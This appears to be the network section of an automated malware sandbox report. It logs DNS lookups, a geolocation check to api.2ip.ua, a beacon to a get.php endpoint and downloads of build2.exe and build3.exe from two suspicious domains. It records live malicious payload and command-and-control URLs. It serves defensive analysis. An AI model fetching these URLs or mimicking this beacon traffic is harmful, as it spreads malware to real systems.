Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
defgyma.com | 190.159.138.51 | |
cajgtus.com | 189.195.132.134 | |
api.2ip.ua | 172.67.139.220 |
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.102:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:50800
-
GET
200
https://api.2ip.ua/geo.json
REQUEST
RESPONSE
BODY
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:13:56 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEfT24k8Ry0bWWYp3QqIr2I15o4UNBjuiXkoyIot%2FsEPmUbSJMgFJyf8fH95tRaNfYPpBy662brjQx%2BfPuPcQLBhdkhY0%2FACsWmPdmekWzZS5L0WSEW%2B85BJJf%2Bj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8999566f28027c49-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://api.2ip.ua/geo.json
REQUEST
RESPONSE
BODY
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:14:39 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RV%2FsZwKKLvmMqZ4%2BV0SP65Bjk6jBXoJelK9NU9JqXGxJ8BDIOAlicXNfj4n4yfsuNKkYB8IIxh3nDh5yGuyg8g14h9q0jT9Se4Dod4DbWhviGjdeV5VKr1TgSMSp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8999577c79482ed0-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://cajgtus.com/test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
REQUEST
RESPONSE
BODY
GET /test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: cajgtus.com
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:15:00 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 558
Content-Type: text/html; charset=UTF-8
Connection: close
GET
200
http://defgyma.com/dl/build2.exe
REQUEST
RESPONSE
BODY
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: defgyma.com
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jun 2024 01:14:42 GMT
Content-Type: application/octet-stream
Content-Length: 327680
Last-Modified: Wed, 29 May 2024 17:20:03 GMT
Connection: close
ETag: "665763c3-50000"
Accept-Ranges: bytes
GET
200
http://cajgtus.com/files/1/build3.exe
REQUEST
RESPONSE
BODY
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: cajgtus.com
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:15:04 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT
ETag: "4ae00-6074de5a4a562"
Accept-Ranges: bytes
Content-Length: 306688
Content-Type: application/x-msdownload
Connection: close
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49171 104.21.65.24:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=2ip.ua | ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1 |
TLSv1 192.168.56.103:49165 104.21.65.24:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=2ip.ua | ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1 |
Snort Alerts
No Snort Alerts